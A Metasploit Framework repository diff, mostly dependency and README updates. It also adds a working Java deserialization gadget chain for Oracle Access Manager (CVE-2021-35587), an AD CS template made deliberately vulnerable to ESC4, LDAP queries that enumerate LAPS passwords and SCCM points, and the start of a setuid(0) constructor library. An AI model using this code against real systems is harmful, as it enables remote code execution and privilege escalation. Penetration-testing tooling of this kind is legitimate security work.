  timecop
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: https://www.metasploit.com/

 Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2025, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -1,218 +1,226 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.1, MIT
+Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.4, MIT
-actionview, 7.0.8.4, MIT
-activemodel, 7.0.8.4, MIT
-activerecord, 7.0.8.4, MIT
-activesupport, 7.0.8.4, MIT
-addressable, 2.8.6, "Apache 2.0"
+actionpack, 7.1.5.1, MIT
+actionview, 7.1.5.1, MIT
+activemodel, 7.1.5.1, MIT
+activerecord, 7.1.5.1, MIT
+activesupport, 7.1.5.1, MIT
+addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.24.5, "Apache 2.0"
-allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.14.0, MIT
+allure-rspec, 2.26.0, "Apache 2.0"
+allure-ruby-commons, 2.26.0, "Apache 2.0"
+arel-helpers, 2.16.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.941.0, "Apache 2.0"
-aws-sdk-core, 3.197.0, "Apache 2.0"
-aws-sdk-ec2, 1.460.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.41.0, "Apache 2.0"
-aws-sdk-iam, 1.99.0, "Apache 2.0"
-aws-sdk-kms, 1.83.0, "Apache 2.0"
-aws-sdk-s3, 1.152.0, "Apache 2.0"
-aws-sdk-ssm, 1.170.0, "Apache 2.0"
-aws-sigv4, 1.8.0, "Apache 2.0"
+aws-eventstream, 1.3.2, "Apache 2.0"
+aws-partitions, 1.1065.0, "Apache 2.0"
+aws-sdk-core, 3.220.1, "Apache 2.0"
+aws-sdk-ec2, 1.511.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.55.0, "Apache 2.0"
+aws-sdk-iam, 1.119.0, "Apache 2.0"
+aws-sdk-kms, 1.99.0, "Apache 2.0"
+aws-sdk-s3, 1.182.0, "Apache 2.0"
+aws-sdk-ssm, 1.191.0, "Apache 2.0"
+aws-sigv4, 1.11.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-bigdecimal, 3.1.8, "ruby, Simplified BSD"
+benchmark, 0.4.0, "ruby, Simplified BSD"
+bigdecimal, 3.1.9, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.18.3, MIT
-bson, 5.0.0, "Apache 2.0"
+bootsnap, 1.18.4, MIT
+bson, 5.0.2, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.4, MIT
+connection_pool, 2.5.0, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
-csv, 3.3.0, "ruby, Simplified BSD"
+csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.1, "Apache 2.0"
-docile, 1.4.0, MIT
+diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.72.4, "Apache 2.0"
+docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
+elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
-em-socksify, 0.3.2, MIT
-erubi, 1.13.0, MIT
+em-socksify, 0.3.3, MIT
+erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.4.6, MIT
-factory_bot_rails, 6.4.3, MIT
-faker, 3.4.1, MIT
+factory_bot, 6.5.1, MIT
+factory_bot_rails, 6.4.4, MIT
+faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+forwardable, 1.3.3, "ruby, Simplified BSD"
 getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.6, MIT
+http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
-httpclient, 2.8.3, ruby
-i18n, 1.14.5, MIT
-io-console, 0.7.2, "ruby, Simplified BSD"
+httpclient, 2.9.0, ruby
+i18n, 1.14.7, MIT
+io-console, 0.8.0, "ruby, Simplified BSD"
+ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.7.2, ruby
-language_server-protocol, 3.17.0.3, MIT
+json, 2.10.2, ruby
+language_server-protocol, 3.17.0.4, MIT
 little-plugger, 1.1.4, MIT
+logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.22.0, MIT
-macaddr, 1.7.2, ruby
-memory_profiler, 1.0.1, MIT
+loofah, 2.24.0, MIT
+memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.2, "New BSD"
-metasploit-credential, 6.0.9, "New BSD"
-metasploit-framework, 6.4.32, "New BSD"
-metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.183, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.3, "New BSD"
-metasploit_payloads-mettle, 1.0.32, "3-clause (or ""modified"") BSD"
+metasploit-concern, 5.0.4, "New BSD"
+metasploit-credential, 6.0.14, "New BSD"
+metasploit-framework, 6.4.65, "New BSD"
+metasploit-model, 5.0.3, "New BSD"
+metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.9, "New BSD"
+metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.5.2, MIT
-mime-types-data, 3.2024.0604, MIT
-mini_portile2, 2.8.7, MIT
-minitest, 5.25.1, MIT
+mime-types, 3.6.0, MIT
+mime-types-data, 3.2025.0304, MIT
+mini_portile2, 2.8.8, MIT
+minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 3.0.0, MIT
-mutex_m, 0.2.0, "ruby, Simplified BSD"
+mustermann, 3.0.3, MIT
+mutex_m, 0.3.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.4.12, "ruby, Simplified BSD"
+net-imap, 0.5.6, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
-net-smtp, 0.5.0, "ruby, Simplified BSD"
-net-ssh, 7.2.3, MIT
+net-smtp, 0.5.1, "ruby, Simplified BSD"
+net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.7.3, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
-nori, 2.7.0, MIT
+nio4r, 2.7.4, "MIT, Simplified BSD"
+nokogiri, 1.18.3, MIT
+nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.24.0, MIT
-parser, 3.3.2.0, MIT
+parallel, 1.26.3, MIT
+parser, 3.3.7.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
-pdf-reader, 2.12.0, MIT
-pg, 1.5.6, "Simplified BSD"
+pdf-reader, 2.14.1, MIT
+pg, 1.5.9, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
-public_suffix, 5.0.5, MIT
-puma, 6.4.2, "New BSD"
+public_suffix, 6.0.1, MIT
+puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.9, MIT
+rack, 2.2.13, MIT
 rack-protection, 3.2.0, MIT
-rack-test, 2.1.0, MIT
+rack-session, 1.0.2, MIT
+rack-test, 2.2.0, MIT
+rackup, 1.0.1, MIT
 rails-dom-testing, 2.2.0, MIT
-rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.4, MIT
+rails-html-sanitizer, 1.6.2, MIT
+railties, 7.1.5.1, MIT
 rainbow, 3.1.1, MIT
 rake, 13.2.1, MIT
-rasn1, 0.13.0, MIT
+rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.5, unknown
-redcarpet, 3.6.0, MIT
-regexp_parser, 2.9.2, MIT
-reline, 0.5.8, ruby
+recog, 3.1.14, unknown
+redcarpet, 3.6.1, MIT
+regexp_parser, 2.10.0, MIT
+reline, 0.6.0, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.16, "New BSD"
-rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.32, "New BSD"
-rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.39, "New BSD"
-rex-java, 0.1.7, "New BSD"
-rex-mime, 0.1.8, "New BSD"
-rex-nop, 0.1.3, "New BSD"
-rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.12, "New BSD"
-rex-registry, 0.1.5, "New BSD"
-rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
-rex-sslscan, 0.1.10, "New BSD"
-rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.58, "New BSD"
-rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.6, "Simplified BSD"
+rex-arch, 0.1.18, "New BSD"
+rex-bin_tools, 0.1.10, "New BSD"
+rex-core, 0.1.34, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
+rex-exploitation, 0.1.41, "New BSD"
+rex-java, 0.1.8, "New BSD"
+rex-mime, 0.1.11, "New BSD"
+rex-nop, 0.1.4, "New BSD"
+rex-ole, 0.1.9, "New BSD"
+rex-powershell, 0.1.101, "New BSD"
+rex-random_identifier, 0.1.15, "New BSD"
+rex-registry, 0.1.6, "New BSD"
+rex-rop_builder, 0.1.6, "New BSD"
+rex-socket, 0.1.61, "New BSD"
+rex-sslscan, 0.1.13, "New BSD"
+rex-struct2, 0.1.5, "New BSD"
+rex-text, 0.2.61, "New BSD"
+rex-zip, 0.1.6, "New BSD"
+rexml, 3.4.1, "Simplified BSD"
+rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.0, MIT
-rspec-expectations, 3.13.2, MIT
-rspec-mocks, 3.13.1, MIT
-rspec-rails, 6.1.4, MIT
+rspec-core, 3.13.3, MIT
+rspec-expectations, 3.13.3, MIT
+rspec-mocks, 3.13.2, MIT
+rspec-rails, 7.1.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.1, MIT
-rubocop, 1.64.1, MIT
-rubocop-ast, 1.31.3, MIT
-ruby-macho, 4.0.1, MIT
-ruby-mysql, 4.1.0, MIT
-ruby-prof, 1.4.2, "Simplified BSD"
+rspec-support, 3.13.2, MIT
+rubocop, 1.67.0, MIT
+rubocop-ast, 1.38.1, MIT
+ruby-macho, 4.1.0, MIT
+ruby-mysql, 4.2.0, MIT
+ruby-prof, 1.7.1, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.10, "New BSD"
-rubyntlm, 0.6.4, MIT
-rubyzip, 2.3.2, "Simplified BSD"
+ruby_smb, 3.3.15, "New BSD"
+rubyntlm, 0.6.5, MIT
+rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
+securerandom, 0.4.1, "ruby, Simplified BSD"
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.3, MIT
+simplecov-html, 0.13.1, MIT
 simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
 sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
-strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
-systemu, 2.6.5, ruby
-test-prof, 1.3.3, MIT
+test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.1, MIT
-tilt, 2.3.0, MIT
-timecop, 0.9.9, MIT
-timeout, 0.4.1, "ruby, Simplified BSD"
+thor, 1.3.2, MIT
+tilt, 2.6.0, MIT
+timecop, 0.9.10, MIT
+timeout, 0.4.3, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.1, MIT
-unicode-display_width, 2.5.0, MIT
+tzinfo-data, 1.2025.1, MIT
+unicode-display_width, 2.6.0, MIT
 unix-crypt, 1.3.1, 0BSD
-uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.1, "ruby, Simplified BSD"
-websocket-driver, 0.7.6, "Apache 2.0"
+webrick, 1.9.1, "ruby, Simplified BSD"
+websocket-driver, 0.7.7, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
-winrm, 2.3.6, "Apache 2.0"
+winrm, 2.3.9, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.36, MIT
-zeitwerk, 2.6.17, MIT
+yard, 0.9.37, MIT
+zeitwerk, 2.7.2, MIT
@@ -1,52 +1,45 @@
-Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
-==
-The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+# Metasploit Framework

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+## Latest Version
+Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+## Documentation
+Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+## Development Environment
+To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+## Bug and Feature Requests
+Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
+## API Documentation
+For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+## Support and Communication
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

-Installing
--
+## Installing Metasploit

-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+### Recommended Installation

-Using Metasploit
--
-Metasploit can do all sorts of things. The first thing you'll want to do
-is start `msfconsole`, but after that, you'll probably be best served by
-reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-or [Metasploit Unleashed][unleashed].
+We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-Contributing
--
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
-dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
-[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.

+## Using Metasploit

-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+To get started with Metasploit:

+1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
+2. **Explore Resources:** 
+   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.

+## Contributing
+
+To contribute to Metasploit:
+
+1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
+2. **Clone the Repository:** Obtain the source code from the official repository.
+3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -41,18 +41,9 @@ module Metasploit
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
      config.autoloader = :zeitwerk

-      case Rails.env
-      when "development"
-        config.eager_load = false
-      when "test"
-        config.eager_load = false
-      when "production"
-        config.eager_load = false
-      end
+      config.load_defaults 7.1

-      if ActiveRecord.respond_to?(:legacy_connection_handling=)
-        ActiveRecord.legacy_connection_handling = false
-      end
+      config.eager_load = false
    end
  end
 end
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -29,4 +29,3 @@ msPKI-Private-Key-Flag: 0x10
 # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
 msPKI-Certificate-Name-Flag: 1
 msPKI-Minimal-Key-Size: 2048
-msPKI-Template-Schema-Version: 1
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -249,7 +249,7 @@ queries:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
    attributes:
      - cn
@@ -373,3 +373,26 @@ queries:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
+    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
+    filter: '(&(userAccountControl=4128))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - logonCount
+      - userAccountControl
+    references:
+      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
+      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+  - action: ENUM_SCCM_MANAGEMENT_POINTS
+    description: 'Find all registered SCCM/MECM management points'
+    filter: '(objectclass=mssmsmanagementpoint)'
+    attributes:
+      - cn
+      - dNSHostname
+      - msSMSSiteCode
+    references:
+      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -1,3 +1,4 @@
+# configuration file for the capture plugin
 spoof_regex: .*
 ntlm_challenge: "1122334455667788"
 ntlm_domain: anonymous
@@ -6,6 +7,7 @@ ssl_cert: null
 logfile: null
 hashdir: null
 services:
+  # authentication services
  - type: DRDA
    enabled: yes
  - type: FTP
@@ -46,6 +48,7 @@ services:
    enabled: yes
  - type: SMTPS
    enabled: yes
+  # spoofing / poisoning services
  - type: NBNS
    enabled: yes
  - type: LLMNR
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,136 @@
+// This gadget chain targets Oracle Access Manager on WebLogic (CVE-2021-35587) and is based upon:
+// * Y4er: https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java
+// * Jang: https://twitter.com/testanull/status/1502114473989279744
+//
+// Tested against Oracle Access Manager version:
+// * 12.2.1.4.0
+// * 12.2.1.3.0
+//
+// Note: The classes used in this chain do not have a serialVersionUID explicitly defined, so the JVM will compute one.
+// This has the effect that if the class changes between versions, the computed serialVersionUID will differ between
+// versions. As such we need to account for this, and generate the gadget for the different versions.
+//
+// We collect these JAR files from the OAM install (actually part of the WebLogic application server).
+// $ sha1sum **/*
+// 6de9309c3bcbc0478da85a8f60325c4ee5419cf1  12.2.1.3.0/coherence.jar
+// d58cf115884e1ae76fb0e7b8e022f7447af63a66  12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar
+// ba45c235668885dff671eff34ee1b6ca57aefa6a  12.2.1.4.0/coherence.jar
+// d3f2e0778774123ae19654ad0960600bddf79389  12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar
+//
+// We can see the serialVersionUID changes for the classes in coherence.jar, for example:
+// $ serialver -classpath 12.2.1.3.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -339238653537079588L;
+// $ serialver -classpath 12.2.1.4.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -453812047863165663L;
+//
+// We can see the serialVersionUID does not change for BasicServiceContext:
+// $ serialver -classpath 12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+// $ serialver -classpath 12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+//
+// Compile with:
+// $ javac -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar gadget.java
+//
+// Run with:
+// $ java --add-opens java.base/java.util=ALL-UNNAMED -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar:. gadget
+//
+// Save the output for that version:
+// $ mv gadget.bin gadget_12.2.1.4.0.bin
+//
+// We then get the following gadget chains:
+// $ sha1sum *.bin
+// 1326ef6fe634e2e2bb83705507d766efbfcfc141  gadget_12.2.1.3.0.bin
+// fad1e1e243dd9aca09658893737341008ef27096  gadget_12.2.1.4.0.bin
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+// coherence.jar
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+// com.bea.core.weblogic.rmi.client.jar
+import weblogic.rmi.provider.BasicServiceContext;
+
+public class gadget {
+
+    public static void main(String[] args) throws Exception
+    {
+        ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
+        ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});
+        ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"EXEC_ARG0", "EXEC_ARG1", "EXEC_ARG2"}});
+
+        ValueExtractor[] valueExtractors = new ValueExtractor[]{
+                reflectionExtractor1,
+                reflectionExtractor2,
+                reflectionExtractor3,
+        };
+
+        Class clazz = ChainedExtractor.class.getSuperclass();
+        Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+        m_aExtractor.setAccessible(true);
+
+        ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+        ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+                reflectionExtractor
+        };
+
+        ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+        PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+        queue.add("1");
+        queue.add("1");
+        m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+        Field field = PriorityQueue.class.getDeclaredField("queue");
+        field.setAccessible(true);
+
+        Object[] queueArray = (Object[]) field.get(queue);
+
+        queueArray[0] = Runtime.class;
+        queueArray[1] = "1";
+
+        BasicServiceContext bsc = new BasicServiceContext(1, queue, false);
+
+        byte[] bytes = serialize(bsc);
+        StringBuilder sb = new StringBuilder();
+        for (byte b : bytes) {
+            sb.append(String.format("%02x", b));
+        }
+        System.out.println(sb.toString());
+
+		FileOutputStream fos = new FileOutputStream("gadget.bin");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(bsc);
+		os.close();
+
+        //deserialize(bytes);
+    }
+
+    public static byte[] serialize(final Object obj) throws IOException {
+        final ByteArrayOutputStream out = new ByteArrayOutputStream();
+        serialize(obj, out);
+        return out.toByteArray();
+    }
+
+    public static void serialize(final Object obj, final OutputStream out) throws IOException {
+        final ObjectOutputStream objOut = new ObjectOutputStream(out);
+        objOut.writeObject(obj);
+        objOut.flush();
+        objOut.close();
+    }
+
+    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+        return deserialize(in);
+    }
+
+    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+        final ObjectInputStream objIn = new ObjectInputStream(in);
+        return objIn.readObject();
+    }
+
+}
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
